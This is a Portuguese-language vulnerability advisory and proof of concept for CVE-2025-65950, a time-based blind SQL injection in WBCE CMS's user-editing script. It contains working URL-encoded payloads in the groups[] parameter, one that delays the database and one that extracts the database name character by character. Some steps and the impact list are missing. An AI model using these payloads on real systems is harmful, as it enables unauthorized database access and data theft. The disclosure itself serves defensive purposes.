
Prova de conceito de exploração para uma vulnerabilidade crítica de injeção SQL cega baseada em tempo no WBCE CMS, permitindo que usuários com privilégios baixos executem consultas SQL arbitrárias e exfiltrem o conteúdo do banco de dados.
| Campo | Detalhes |
|---|
| CVE ID | CVE-2025-65950 |
| Gravidade | CRITICAL |
| Aviso | Ver Aviso |
| Descoberto por | Lukasz Rybak |
Uma vulnerabilidade crítica de Injeção SQL no módulo de gerenciamento de usuários permite que um usuário autenticado com baixos privilégios e permissões para modificar usuários execute consultas SQL arbitrárias. Isso pode ser escalado para um comprometimento total do banco de dados, exfiltração de dados, contornando efetivamente todos os controles de segurança.
A vulnerabilidade existe no script admin/users/save.php, que lida com atualizações nos perfis de usuários. O script processa de forma inadequada o parâmetro groups[] enviado pelo formulário de edição de usuário.
A prova de conceito envolve o uso de uma injeção SQL cega baseada em tempo para confirmar a execução arbitrária de SQL.
users_modify). Este usuário não precisa ser um administrador completo.
Passos para Reprodução:
a. Faça login como o usuário de baixo privilégio. b. Navegue até "Acesso" -> "Usuários" e selecione qualquer usuário para modificação.



d. Edite o parâmetro `groups[]` com o seguinte payload codificado em URL, que tentará fazer o banco de dados aguardar por 10 segundos: groups%5B%5D=2%27+%2C+%60active%60+%3D+SLEEP(10)+--+
*(Payload decodificado: 2' , `active` = SLEEP(10) -- )*
f. Envie a solicitação modificada.
3. Verificação:

Exemplo de Exfiltração de Dados: Obtendo o Nome do Banco de Dados
**Exemplo de Payload para Testar um Caractere:**
groups%5B%5D=2%27+%2C+%60active%60+%3D+IF(SUBSTRING(DATABASE()%2C+1%2C+1)+%3D+%27w%27%2C+SLEEP(5)%2C+0)+--+
Esse processo manual pode ser continuado para revelar o nome completo do banco de dados e, posteriormente, quaisquer outros dados no banco de dados.


Um usuário de baixo privilégio, que deveria ser capaz apenas de fazer alterações benignas nos perfis de usuários, pode obter controle total sobre o banco de dados.
O impacto inclui, mas não se limita a:
Este CVE foi divulgado de forma responsável, seguindo práticas de divulgação coordenada de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.